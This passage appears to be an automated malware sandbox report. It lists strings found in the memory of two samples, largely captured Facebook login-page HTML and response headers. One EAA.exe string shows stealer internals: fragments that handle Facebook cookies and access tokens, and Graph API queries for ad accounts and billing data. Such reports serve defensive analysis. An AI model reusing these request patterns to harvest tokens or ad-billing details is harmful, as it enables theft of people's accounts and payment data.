causes.">Fundraisers</a></li><li><a href="/biz/directory/" title="Browse our Facebook Services directory.">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Center.">Voting Information Center</a></li><li><a href="/groups/explore/" title="Explore our Groups.">Groups</a></li><li><a href="https://about.facebook.com/" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a></li><li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto" title="Advertise on Facebook.">Create Ad</a></li><li><a href="/pages/create/?ref_type=site_footer" title="Create a page">Create Page</a></li><li><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a></li><li><a href="
Source: 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: )</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2Fzh-cn.facebook.com%2Flogin.php%3Fnext%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fmanager%252Faccount_settings%252Faccount_billing&amp;source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_ot1t5YjYL3s sx_2cfa7d"></i></a></li></ul><div id="contentCurve"></div><div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links"><ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i"><li><a href="/reg/" title="Sign Up for Facebook">Sign Up</a></li><li><a href="/login/" title="Log into Facebook">Log In</a></li><li><a href="https://messenger.com/" title="Check out Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li><li><a href="https://www.facebook.com/watch/" title="Browse our Watch videos.">Watch</a></li><li><a href="/places/" title="Check out popular places on Facebook.">Places</a></li><li><a href="/games/" title="Check out Facebook games.">Games</a></li><li><a href="/marketplace/" title="Buy and sell on Facebook Marketplace.">Marketplace</a></li><li><a href="https://pay.facebook.com/" title="Learn more about Meta Pay" target="_blank">Meta Pay</a></li><li><a href="https://www.oculus.com/" title="Learn more about Oculus" target="_blank">Oculus</a></li><li><a href="https://portal.facebook.com/" title="Learn more about Facebook Portal" target="_blank">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT3Fx88AL6YXuc7T7uUsDzkJgrNPVa0SWpimF2Ojh5NZn7SMI-C2M0DnriCHxYRxQ2xunOCmUGhC44W06kRKaPYgmDmRXQXr11GceZLamN8hWG5MX9-pBtk1QwNhuycywaFJ21XuahAHBf2Pg5QDSA" title="Check out Instagram" target="_blank" rel="noopener nofollow" data-lynx-mode="asynclazy">Instagram</a></li><li><a href="https://www.bulletin.com/" title="Check out Bulletin Newsletter">Bulletin</a></li><li><a href="/local/lists/245019872666104/" title="Browse our Local Lists directory.">Local</a></li><li><a href="/fundraisers/" title="Donate to worthy causes.">Fundraisers</a></li><li><a href="/biz/directory/" title="Browse our Facebook Services directory.">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="See the Voting Information Center.">Voting Information Center</a></li><li><a href="/groups/explore/" title="Explore our Groups.">Groups</a></li><li><a href="https://about.facebook.com/" accesskey="8" title="Read our blog, discover the resource center, and find job opportunities.">About</a></li><li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto" title="Advertise on Facebook.">Create Ad</a></li><li><a href="/pages/create/?ref_type=site_footer" title="Create a page">Create Page</a></li><li><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a></li><li><a href="
Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, EAA.exe, 0000000C.00000002.648461867.0000000002480000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.648461867.0000000002480000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing8( equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing[ equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.569618509.000000000085E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billingt equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.648586287.0000000002489000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 4 /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing_used,form_data,display_name,icon_url,federation_url,skip_z equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.617089306.00000000005BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 4]www.facebook.comHTEP equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.565334783.0000000000809000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: :false});</script><script nonce="3nHgiaRw">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="3nHgiaRw"></style><script nonce="3nHgiaRw">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" / equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: </a></li><li><a class="_sv4" dir="ltr" href="https://hi-in.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;hi_IN&quot;, &quot;en_US&quot;, &quot;https:\/\/hi-in.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 8); return false;" title="Hindi"> equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: </a></li><li><a class="_sv4" dir="ltr" href="https://zh-cn.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;zh_CN&quot;, &quot;en_US&quot;, &quot;https:\/\/zh-cn.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 9); return false;" title="Simplified Chinese (China)"> equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.651496776.00000001400E2000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: <Unknown exceptionbad array new lengthstring too longmap/set too longoottpokmummoomymtetgnotsafecodea93i2ggcocodecamtheeeedvgggkuah34g34lnstalisiiduhqarg22223wdn_prc_useMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36bfceice-based/login/in/dev/log"="t""jazoeslsd"id""u=urce""sot=oesjaz&lsdd=&uice=ur&soxt=&ne-based/login/blogin/device_usersonokieJcoonieJscookunt_billingccount_settings/accofcebads/manager/a_token:cessactID:un{accogettIdounaccers=false&method=get&pretty=0&suppress_http_code=1_unpaid_unrepaid_invoice%22%2C%22has_repay_processing_invoices%22%5D&include_headed_market%22%2C%22current=%5B%22active_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22can_pay_now%22%2C%22can_repay_now%22%2C%22current_unbilled_spend%22%2C%22extended_credit_info%22%2C%22is_br_entity_account%22%2C%22has_extended_credit%22%2C%22max_billing_threshold%22%2C%22min_billing_threshold%22%2C%22min_payment%22%2C%22next_bill_date%22%2C%22pending_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22promotion_progress_bar_info%22%2C%22show_improved_boleto%22%2C%22business%7Bid%2Cname%2Cpayment_account_id%7D%22%2C%22total_prepay_balance%22%2C%22is_in_3ds_authorization_enablymentsAccountDataDispatcher&fields3.0/act_fb_uid?access_token=fb_access_token&_reqName=adaccount&_reqSrc=AdsCMPahttps://graph.facebook.com/v1b_uidfenccess_tokfb_ayInfopaoway_ncan_pnfopayIit=100&method=get&pretty=0&sort=name_ascending&suppress_http_code=1le_business%7Bid%2Cname%7D%22%2C%22name%22%5D&filtering=%5B%5D&include_headers=false&limatus%22%2C%22is_direct_deals_enabled%22%2C%22business%7Bid%2Cname%7D%22%2C%22viewabess_token=fb_access_token&_reqName=me%2Fadaccounts&_reqSrc=AdsTypeaheadDataManager&fields=%5B%22account_id%22%2C%22account_sthttps://graph.facebook.com/v13.0/me/adaccounts?accs_tokencesfb_aciiiqqgataddatdataaccount_idssbusinet_settings&tab=account_billing_settingscount_id&pid=p1&business_id=fb_business_id&page=accounanager/account_settings/account_billing/?act=fb_achttps://business.facebook.com/ads/mnt_idfb_accousiness_idfb_buaccess_token:countIday_processing_invoices%22%5D&include_headers=false&method=get&pretty=0&suppress_http_code=1unpaid_unrepaid_invoice%22%2C%22has_repotal_prepay_balance%22%2C%22is_in_3ds_authorization_enabled_market%22%2C%22current_ling_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22can_pay_now%22%2C%22can_repay_now%22%2C%22current_unbilled_spend%22%2C%22extended_credit_info%22%2C%22is_br_entity_account%22%2C%22has_extended_credit%22%2C%22max_billing_threshold%22%2C%22min_billing_threshold%22%2C%22min_payment%22%2C%22next_bill_date%22%2C%22pending_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22promotion_progress_bar_info%22%2C%22show_improved_boleto%22%2C%22business%7Bid%2Cname%2Cpayment_account_id%
Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="3nHgiaRw">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjXwGRwR5nq_Sdvq_k","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4p8q2dfm5zPEfMCPU","isCQuick":false});</script><script nonce="3nHgiaRw">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="3nHgiaRw"></style><script nonce="3nHgiaRw">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2FacceU equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.564547918.0000000000557000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="3nHgiaRw">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjXwGRwR5nq_Sdvq_k","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4p8q2dfm5zPEfMCPU","isCQuick":false});</script><script nonce="3nHgiaRw">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="3nHgiaRw"></style><script nonce="3nHgiaRw">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="short equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.557979104.000000000055D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="3nHgiaRw">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjXwGRwR5nq_Sdvq_k","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4p8q2dfm5zPEfMCPU","isCQuick":false});</script><script nonce="3nHgiaRw">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="3nHgiaRw"></style><script nonce="3nHgiaRw">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yh/l/0,cross/Psnx7bG9mEY.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="JJDQYLd" crossorigin="anonymous" /> equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647535642.0000000002446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="M5pAlxU0">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjXwGRwR5nq_SdvGZk","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4p8q2dfm5zPEfMJMk","isCQuick":false});</script><script nonce="M5pAlxU0">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="M5pAlxU0"></style><script nonce="M5pAlxU0">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/dat equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647322110.0000000002439000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="tBkKtFtO">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjXwGRwR5nq_SdvtAs","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4p8q2dfm5zPEfMqV8","isCQuick":false});</script><script nonce="tBkKtFtO">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="tBkKtFtO"></style><script nonce="tBkKtFtO">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2FaccC equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.646079526.000000000241D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="tBkKtFtO">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjXwGRwR5nq_SdvtAs","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4p8q2dfm5zPEfMqV8","isCQuick":false});</script><script nonce="tBkKtFtO">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="tBkKtFtO"></style><script nonce="tBkKtFtO">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /3"; ma=86 equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.648794780.000000000249C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: <head><meta charset="utf-8" /><meta name="referrer" content="origin-when-crossorigin" id="meta_referrer" /><script nonce="tBkKtFtO">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({"ajaxpipe_token":"AXjXwGRwR5nq_SdvtAs","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ4p8q2dfm5zPEfMqV8","isCQuick":false});</script><script nonce="tBkKtFtO">(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL=function(a,b,c,d){return window.openDatabase(a,b,c,d)};window.openDatabase=function(){throw new Error()}}b(a)})(this);</script><style nonce="tBkKtFtO"></style><script nonce="tBkKtFtO">__DEV__=0;CavalryLogger=false;</script><noscript><meta http-equiv="refresh" content="0; URL=/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing&amp;_fb_noscript=1" /></noscript><link rel="manifest" id="MANIFEST_LINK" href="/data/manifest/" crossorigin="use-credentials" /><title id="pageTitle">Log into Facebook</title><meta name="description" content="Log into Facebook to start sharing and connecting with your friends, family, and people you know." /><meta property="og:site_name" content="Facebook" /><meta property="og:url" content="https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" /><meta property="og:locale" content="en_US" /><link rel="canonical" href="https://www.facebook.com/login/web/" /><link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico" /><link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yh/l/0,cross/Psnx7bG9mEY.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="JJDQYLd" crossorigin="anonymous" /> equals www.facebook.com (Facebook)
Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: @okwww.facebook.comI equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp, 2A57.exe, 00000008.00000002.646563677.000000000083A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: @www.facebook.com equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000002.646563677.000000000083A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: @www.facebook.comz# equals www.facebook.com (Facebook)
Source: 2A57.exe, 00000008.00000003.568475419.000000000083A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Alt-Svch3=":443"; ma=86400, h3-29=":443"; ma=86400Priorityu=3,iX-FB-DebugNIzC4F1vFACekGvbRuCZvM9i/JJ7xmKSRYpVB7zr3dgmTAvfu/cTqkCH0BDO/wQ9P8BkQs4IOzM64ZCiUQ18bA==content-security-policydefault-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;content-security-policy-report-onlydefault-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policyunsafe-nonedocument-policyforce-load-at-topx-fb-rlafr0report-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveThu, 13 Oct 2022 11:08:02 GMTD
Source: EAA.exe, 0000000C.00000002.647817384.000000000245C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Alt-Svch3=":443"; ma=86400, h3-29=":443"; ma=86400Priorityu=3,iX-FB-Debugv9pvwjTBeSyc6REtf/HyyrsHzOiKKGeco98baI/NkC+BXnPN992p97wxzlPbt3fTR3c3Oeg1pmH+0Ypr4oGtng==content-security-policydefault-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;content-security-policy-report-onlydefault-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;X-Frame-OptionsDENYX-XSS-Protection0X-Content-Type-Optionsnosniffcross-origin-opener-policyunsafe-nonedocument-policyforce-load-at-topx-fb-rlafr0report-to{"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}Persistent-AuthWWW-AuthenticateAccept-EncodingVarySet-CookieServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedSat, 01 Jan 2000 00:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset="utf-8"Content-TypeContent-LengthAllowWarningViaUpgradechunkedTransfer-EncodingTrailerno-cachePragmaKeep-AliveThu, 13 Oct 2022 11:08:18 GMTD
